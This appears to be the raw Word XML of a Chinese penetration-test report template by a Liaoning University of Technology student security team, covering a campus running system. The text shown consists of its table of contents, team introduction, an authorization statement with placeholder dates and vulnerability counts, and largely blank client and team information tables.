              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc8059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A106DF">
            <w:pPr>
              <w:pStyle w:val="17"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8413"/>
                <w:tab w:val="clear" w:pos="8494"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK \l _Toc14206 </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.2 安全管理方面</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc14206 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D1B524">
            <w:pPr>
              <w:pStyle w:val="17"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8413"/>
                <w:tab w:val="clear" w:pos="8494"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK \l _Toc28286 </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.3 安全技术方面</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28286 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD25F4E">
            <w:pPr>
              <w:pStyle w:val="17"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8413"/>
                <w:tab w:val="clear" w:pos="8494"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK \l _Toc22420 </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.4 开发过程管理</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc22420 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4DE587">
            <w:pPr>
              <w:pStyle w:val="17"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8413"/>
                <w:tab w:val="clear" w:pos="8494"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK \l _Toc4226 </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.5 安全</w:t>
            </w:r>
            <w:r>
              <w:t>架构设计基本原则</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc4226 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="60151EC8">
            <w:pPr>
              <w:pStyle w:val="13"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8413"/>
                <w:tab w:val="clear" w:pos="8494"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK \l _Toc28117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附录A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>安全风险状况等级说明</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28117 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA5EF3E">
            <w:pPr>
              <w:pStyle w:val="13"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8413"/>
                <w:tab w:val="clear" w:pos="8494"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK \l _Toc20344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附录B </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>漏洞等级状况说明</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20344 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E8DC2BB">
            <w:pPr>
              <w:pStyle w:val="79"/>
              <w:ind w:left="0" w:leftChars="0" w:right="210" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="44918EAE">
            <w:pPr>
              <w:pStyle w:val="79"/>
              <w:ind w:left="0" w:leftChars="0" w:right="210" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="136BFD44">
            <w:pPr>
              <w:pStyle w:val="79"/>
              <w:ind w:left="0" w:leftChars="0" w:right="210" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="368DF1A4">
            <w:pPr>
              <w:pStyle w:val="79"/>
              <w:ind w:left="0" w:leftChars="0" w:right="210" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07C7C105">
            <w:pPr>
              <w:pStyle w:val="79"/>
              <w:ind w:left="0" w:leftChars="0" w:right="210" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69B01BA4">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc15461945"/>
      <w:bookmarkStart w:id="2" w:name="_Toc11859773"/>
      <w:bookmarkStart w:id="3" w:name="_Toc15464558"/>
      <w:bookmarkStart w:id="4" w:name="_Toc29728"/>
      <w:bookmarkStart w:id="5" w:name="_Toc394569376"/>
      <w:bookmarkStart w:id="6" w:name="_Toc251332380"/>
      <w:bookmarkStart w:id="7" w:name="_Toc280310872"/>
      <w:bookmarkStart w:id="8" w:name="_Toc265848426"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>摘要</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="72FEF05B">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc6923"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测评团队简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5B8FF27F">
      <w:pPr>
        <w:pStyle w:val="99"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大学生探索网网络安全团队（LNUTTSW），隶属于辽宁工业大学智慧校园建设中心大学生探索网学生创新团队。团队始创于2016年9月，秉承着“实践 创新 探索 发展”的口号在2016年至2019年连续四年获得全国高校网络信息安全运维挑战赛东北赛区三等奖；2018年至2022年连续四年荣获网络安全技能大赛二等奖及三等奖；2023年至2024年连续两年荣获ISCC全国二等奖及全国三等奖；近年来承接锦州市公安局，辽宁省公安厅，国家公安部，国家教育部等组织的网络安全攻防演练中屡创佳绩。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321E0563">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc19316"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>项目信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0F1C3CED">
      <w:pPr>
        <w:pStyle w:val="99"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>辽宁工业大学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>智慧校园建设中心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>授权，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大学生探索网网络安全团队</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>校跑</w:t>
      </w:r>
      <w:r>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行了安全渗透测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2783FE08">
      <w:pPr>
        <w:pStyle w:val="99"/>
      </w:pPr>
      <w:r>
        <w:t>经过测试发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>校跑</w:t>
      </w:r>
      <w:r>
        <w:t>系统存在安全漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx个</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFEE86D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6087D">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc15464559"/>
      <w:bookmarkStart w:id="12" w:name="_Toc11859774"/>
      <w:bookmarkStart w:id="13" w:name="_Toc15461946"/>
      <w:bookmarkStart w:id="14" w:name="_Toc26027"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="742C1055">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc251332381"/>
      <w:bookmarkStart w:id="16" w:name="_Toc15461947"/>
      <w:bookmarkStart w:id="17" w:name="_Toc15464560"/>
      <w:bookmarkStart w:id="18" w:name="_Toc993"/>
      <w:bookmarkStart w:id="19" w:name="_Toc11859775"/>
      <w:bookmarkStart w:id="20" w:name="_Toc280310873"/>
      <w:bookmarkStart w:id="21" w:name="_Toc265848427"/>
      <w:bookmarkStart w:id="22" w:name="_Toc394569377"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>委托单位信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="8276"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757"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2064"/>
        <w:gridCol w:w="2115"/>
      </w:tblGrid>
      <w:tr w14:paraId="5FAB45E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58" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50B0B281">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:bookmarkStart w:id="23" w:name="_Toc43112380"/>
            <w:bookmarkStart w:id="24" w:name="_Toc41287614"/>
            <w:bookmarkStart w:id="25" w:name="_Toc43189981"/>
            <w:bookmarkStart w:id="26" w:name="_Toc38362871"/>
            <w:bookmarkStart w:id="27" w:name="_Toc34809239"/>
            <w:bookmarkStart w:id="28" w:name="_Toc33250199"/>
            <w:bookmarkStart w:id="29" w:name="_Toc34809575"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单位名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6519" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4365642B">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>辽宁工业大学</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>智慧校园建设中心</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5121764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58" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AC51785">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>委托项目名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6519" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271035BD">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>辽宁工业大学</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xx月渗透测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0880D1C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58" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="527B24D8">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单位地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6519" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13350AB9">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="603683A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58" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="314901F1">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>联系人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E4CA384">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2064" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02528F3C">
            <w:pPr>
              <w:pStyle w:val="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>联系电话</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2115" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="528EE22A">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3D377A">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc265848428"/>
      <w:bookmarkStart w:id="31" w:name="_Toc15461948"/>
      <w:bookmarkStart w:id="32" w:name="_Toc202095459"/>
      <w:bookmarkStart w:id="33" w:name="_Toc394569378"/>
      <w:bookmarkStart w:id="34" w:name="_Toc21791"/>
      <w:bookmarkStart w:id="35" w:name="_Toc11859776"/>
      <w:bookmarkStart w:id="36" w:name="_Toc230515488"/>
      <w:bookmarkStart w:id="37" w:name="_Toc280310874"/>
      <w:bookmarkStart w:id="38" w:name="_Toc190749149"/>
      <w:bookmarkStart w:id="39" w:name="_Toc199212060"/>
      <w:bookmarkStart w:id="40" w:name="_Toc15464561"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测评</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>团队</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="8276"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777"/>
        <w:gridCol w:w="6499"/>
      </w:tblGrid>
      <w:tr w14:paraId="669FA87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trHeight w:val="407" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53C84AC3">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>团队</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C1F529F">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>大学生探索网网络安全团队LNUTTSW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4883C8D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7" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39853D01">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试负责人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F58EA0C">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="626DAB1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trHeight w:val="2337" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
